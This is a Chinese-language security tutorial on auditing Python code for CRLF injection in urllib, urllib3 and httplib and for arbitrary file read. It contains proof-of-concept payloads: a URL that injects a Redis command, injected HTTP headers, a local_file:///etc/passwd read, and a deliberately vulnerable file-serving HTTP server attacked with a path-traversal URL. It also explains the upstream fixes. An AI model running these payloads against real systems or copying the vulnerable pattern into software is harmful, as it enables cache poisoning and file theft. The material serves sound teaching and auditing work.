Python代码审计实战案例总结之CRLF和任意文件读取
Python代码审计实战案例总结之CRLF和任意文件读取
介绍
Python代码审计方法多种多样,但是总而言之是根据前人思路的迁移融合扩展而形成。目前Python代码审计思路,呈现分散和多样的趋势。Python微薄研发经验以及结合实际遇到的思路和技巧进行总结,以便于朋友们的学习和参考。
CRLF和任意文件读取的审计实战
CRLF 审计实战
CRLF的问题经常会出现在Python的模块之中,曾经有案例说明httplib模块、urllib模块等存在CRLF问题。问题来源于模块对于\x0d\x0a(\r\n)处理并不严格。如果该问题被有效利用,可能会导致 Memcached和Redis 等缓存应用出现问题,严重可获得shell。在审计中多尝试插入\r\n,包括不同的位置,也许会有新的发现。
urllib CRLF漏洞(CVE-2019-9740和CVE-2019-9947)
这个问题关于urllib模块,被插入\r\n导致CRLF问题。另外,如果攻击者在攻击载荷之中加入缓存应用命令,可能导致严重的安全隐患。下面看下 POC 。
#!/usr/bin/env python3import sysimport urllibimport urllib.errorimport urllib.request
host = "10.251.0.83:6379?\r\nSET test success\r\n"url = "http://" + host + ":8080/test/?test=a"try:
info = urllib.request.urlopen(url).info()
print(info)except urllib.error.URLError as e:
print(e)POC 中使用了 sys、urllib、urllib.error、urllib.request 模块,测试目标的 IP 为 10.251.0.83 ,咱们在 host 之中插入 \r\n 和 redis 命令 “SET test success” ,目前为了实现 验证 CRLF 并且尝试污染 redis 缓存。在尝试执行此攻击后,检查redis服务器:
127.0.0.1:6379> GET test"success"
127.0.0.1:6379>在 redis 服务器中可以看到缓存已经被污染,多了 test 属性值为 success 。
紧接着,咱们通过漏洞修补日志可得知对于URL上的内容进行了检查,如下所示。修复中使用了 re 模块利用正则的方式检查十六进制 \x00-\x20 和 \x7f 。若感兴趣,可访问下面的链接进一步查看详情。
# https://github.githistory.xyz/python/cpython/blob/96aeaec64738b730c719562125070a52ed570210/Lib/http/client.py_contains_disallowed_url_pchar_re = re.compile('[\x00-\x20\x7f]')# Arguably only these _should_ allowed:# _is_allowed_url_pchars_re = re.compile(r"^[/!$&'()*+,;=:@%a-zA-Z0-9._~-]+$")# We are more lenient for assumed real world compatibility purposes.# We always set the Content-Length header for these methods because some# servers will otherwise respond with a 411_METHODS_EXPECTING_BODY = {'PATCH', 'POST', 'PUT'}另外在urilib3中也存在同样问题,可见此种问题是模块的通病,测试和修复方法类似不再阐述。
import urllib3
pool_manager = urllib3.PoolManager()
host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"url = "https://" + host + ":8080/test/?test=a"try: info = pool_manager.request('GET', url).info()
print(info)
except Exception:
pass# nc -l localhost 7777GET /?a=1 HTTP/1.1X-injected: header
TEST: 123:8080/test/?test=a HTTP/1.1Host: localhost:7777Accept-Encoding: identityhttplib CRLF 漏洞
之后咱们看下httplib模块的问题。这个问题由 HACKERONE 的审核们确认,POC 如下所示。通过 POC 可以看到,先使用 LINUX 下的 nc 命令开启 7777 端口,然后编写脚本在 httplib.HTTPConnection 写入目标的 IP 和 端口,这里是 192.168.158.129 和 7777,使用 request 方法执行HTTP GET 请求,在请求参数之后插入 \r\n 和用于测试的字符串 TEST: 123 , nc 上收到请求报文,根据报文得出 httplib 的 request 方法存在 CRLF 问题。
# KALI LINUX 命令行1 :nc -l -p 7777# root@柠檬菠萝:~# nc -l -p 7777# GET a=1HTTP/1.1# X-injected: header# TEST: 123 HTTP/1.1# Host: 192.168.158.129:7777# Accept-Encoding: identity# KALI LINUX 命令行2:import httplib
conn = httplib.HTTPConnection("192.168.158.129:7777")
conn.request("GET", "a=1HTTP/1.1\r\nX-injected: header\r\nTEST: 123")
r1 = conn.getresponse()print (r1.status, r1.reason)任意文件读取的审计实战
在Python urllib 模块中有所体现,专注于HTTP请求响应的模块,因为缓解SSRF和任意文件读取故不支持file协议。另外还有部分业务下载文件,在使用 open 方法解决时就有可能存在任意文件读取漏洞。下面来看案例。
urllib local_file协议绕过导致任意文件读取漏洞(CVE-2019-9948)
模块为了缓解漏洞影响,将 file:// 加入黑名单。咱们在进行测试时候 “urllib.urlopen(‘file:///etc/passwd’)” 会被模块中的黑名单匹配到 file 从而被禁止。但是由于在linux中支持 local_file:// 读取文件,所以导致了绕过问题。下面为 POC 。
import urllibprint urllib.urlopen('local_file:///etc/passwd').read()[:30]POC 向咱们展示在 urllib.urlopen 方法中执行 “local_file”, read() 为获取文本信息,[:30] 为对于获取到的文本信息进行分片。
在模块中很难识别哪些允许访问,禁用协议是很棒的好方法,简单有效。实际也是如此修补的,urltype 之中是 local_file 协议的特征,在第203行被拼接为 open_local_file 字符串,它在第208行被if 语句进行检测和禁止。
任意文件读取实例
咱们自己编写简单案例,使用 urllib、SocketServer、SimpleHTTPRequestHandler模块,在Python2的环境下搭建简单的HTTP服务器,在do_GET方法中,咱们通过urllib.splitquery(self.path)获取到参数并给他赋值到uri_c,再使用open()打开uri_c中的内容,从而产生任意文件读取漏洞。实例代码如下。
import urllibimport SocketServerfrom SimpleHTTPServer import SimpleHTTPRequestHandlerclass MyHandler(SimpleHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers() def do_GET(self):
print("got get request %s" % (self.path))
hql = urllib.splitquery(self.path)[1]
uri_c = str(hql)
print('cmd===%s' % (uri_c))
file = open(uri_c)
self.wfile.write(file.read())
file.close()def start_server():
httpd = SocketServer.TCPServer(("127.0.0.1", 8090), MyHandler)
print('Starting httpd...')
httpd.serve_forever()if __name__ == "__main__":
start_server()咱们在启动服务之后根据脚本中定义 127.0.0.1:8090 访问。在参数部分尝试任意文件读取,即可读取到目标文件内容。在这里尝试读取Windows\win.ini,使用“http://127.0.0.1:8090/?../../../../Windows\win.ini”进行攻击,返回结果如下。
# URL : http://127.0.0.1:8090/?../../../../Windows\win.ini; for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1总结
文中分享CRLF和任意文件读取的实战案例。案例大多数来源于收集,少部分为个人挖掘。分享的案例帮助咱们较为深入了解,如何发现和挖掘CRLF问题,同时也有相关的修复案例。CRLF 使用的过滤 [\x00-\x20\x7f] 进行防御,任意文件读取使用的限制文件读取协议来进行缓解,也可采用限制文件访问路径来达到防御。
*本文原创作者:米怀特,本文属于FreeBuf原创奖励计划,未经许可禁止转载